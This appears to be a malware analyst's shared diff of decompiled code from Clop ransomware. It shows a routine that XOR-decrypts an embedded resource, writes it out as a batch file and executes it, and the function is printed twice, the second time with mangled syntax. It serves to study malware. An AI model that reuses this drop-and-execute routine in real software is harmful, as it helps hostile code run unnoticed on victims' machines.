danzek · April 1, 2019 22:39 · danzek · Apr 3, 2019
diff --git a/deobfuscateClopResource.cpp b/deobfuscateClopResource.cpp
 HINSTANCE LoadExecuteClearSystemsBatchFile()
 {
  HMODULE hModule; // eax
  HMODULE phModule; // ebx
  HRSRC hRsrcSIXSIX1; // eax
  HRSRC phRsrcSIXSIX1; // esi
  HGLOBAL hGlobalRsrcSIXSIX1; // eax
  const void *ResourceLock; // edi
  DWORD cbResourceSIXSIX1; // esi
  HGLOBAL hDecryptedResourceMemory; // ebx
  DWORD pcbResourceSIXSIX1; // edi
  DWORD i; // esi
  HANDLE hDecryptedFile; // esi
  DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-214h]
  DWORD nNumberOfBytesToWrite; // [esp+10h] [ebp-210h]
  CHAR currentPath; // [esp+14h] [ebp-20Ch]
  CHAR FileName; // [esp+118h] [ebp-108h]

  hModule = GetModuleHandleW(0);
  phModule = hModule;
  hRsrcSIXSIX1 = FindResourceW(hModule, (LPCWSTR)0xF447, L"SIXSIX1");
  phRsrcSIXSIX1 = hRsrcSIXSIX1;
  hGlobalRsrcSIXSIX1 = LoadResource(phModule, hRsrcSIXSIX1);
  ResourceLock = LockResource(hGlobalRsrcSIXSIX1);
  cbResourceSIXSIX1 = SizeofResource(phModule, phRsrcSIXSIX1);
  nNumberOfBytesToWrite = cbResourceSIXSIX1;
  hDecryptedResourceMemory = GlobalAlloc(GMEM_ZEROINIT, cbResourceSIXSIX1);
  memmove(hDecryptedResourceMemory, ResourceLock, cbResourceSIXSIX1);
  pcbResourceSIXSIX1 = cbResourceSIXSIX1;
  for ( i = 0; i < pcbResourceSIXSIX1; ++i )
    *((_BYTE *)hDecryptedResourceMemory + i) ^= charArrMagicStr[i % 0x42];
  GetCurrentDirectoryA(260u, &currentPath);
  wsprintfA(&FileName, "%s\\clearsystems-10-1.bat", &currentPath);
  NumberOfBytesWritten = 0;
  hDecryptedFile = CreateFileA(&FileName, 0x40000000u, 2u, 0, 4u, 0x80u, 0);
  if ( hDecryptedFile != (HANDLE)-1 )
  {
    WriteFile(hDecryptedFile, hDecryptedResourceMemory, pcbResourceSIXSIX1, &NumberOfBytesWritten, 0);
    CloseHandle(hDecryptedFile);
  }
  GlobalFree(hDecryptedResourceMemory);
  return ShellExecuteA(0, "open", &FileName, 0, 0, 0);
 }
	HINSTANCE LoadExecuteClearSystemsBatchFile()
	{
	HMODULE hModule; // eax
	HMODULE phModule; // ebx
	HRSRC hRsrcSIXSIX1; // eax
	HRSRC phRsrcSIXSIX1; // esi
	HGLOBAL hGlobalRsrcSIXSIX1; // eax
	const void *ResourceLock; // edi
	DWORD cbResourceSIXSIX1; // esi
	HGLOBAL hDecryptedResourceMemory; // ebx
	DWORD pcbResourceSIXSIX1; // edi
	DWORD i; // esi
	HANDLE hDecryptedFile; // esi
	DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-214h]
	DWORD nNumberOfBytesToWrite; // [esp+10h] [ebp-210h]
	CHAR currentPath; // [esp+14h] [ebp-20Ch]
	CHAR FileName; // [esp+118h] [ebp-108h]

	hModule = GetModuleHandleW(0);
	phModule = hModule;
	hRsrcSIXSIX1 = FindResourceW(hModule, (LPCWSTR)0xF447, L"SIXSIX1");
	phRsrcSIXSIX1 = hRsrcSIXSIX1;
	hGlobalRsrcSIXSIX1 = LoadResource(phModule, hRsrcSIXSIX1);
	ResourceLock = LockResource(hGlobalRsrcSIXSIX1);
	cbResourceSIXSIX1 = SizeofResource(phModule, phRsrcSIXSIX1);
	nNumberOfBytesToWrite = cbResourceSIXSIX1;
	hDecryptedResourceMemory = GlobalAlloc(GMEM_ZEROINIT, cbResourceSIXSIX1);
	memmove(hDecryptedResourceMemory, ResourceLock, cbResourceSIXSIX1);
	pcbResourceSIXSIX1 = cbResourceSIXSIX1;
	for ( i = 0; i < pcbResourceSIXSIX1; ++i )
	((_BYTE )hDecryptedResourceMemory + i) ^= charArrMagicStr[i % 0x42];
	GetCurrentDirectoryA(260u, &currentPath);
	wsprintfA(&FileName, "%s\\clearsystems-10-1.bat", &currentPath);
	NumberOfBytesWritten = 0;
	hDecryptedFile = CreateFileA(&FileName, 0x40000000u, 2u, 0, 4u, 0x80u, 0);
	if ( hDecryptedFile != (HANDLE)-1 )
	{
	WriteFile(hDecryptedFile, hDecryptedResourceMemory, pcbResourceSIXSIX1, &NumberOfBytesWritten, 0);
	CloseHandle(hDecryptedFile);
	}
	GlobalFree(hDecryptedResourceMemory);
	return ShellExecuteA(0, "open", &FileName, 0, 0, 0);
	}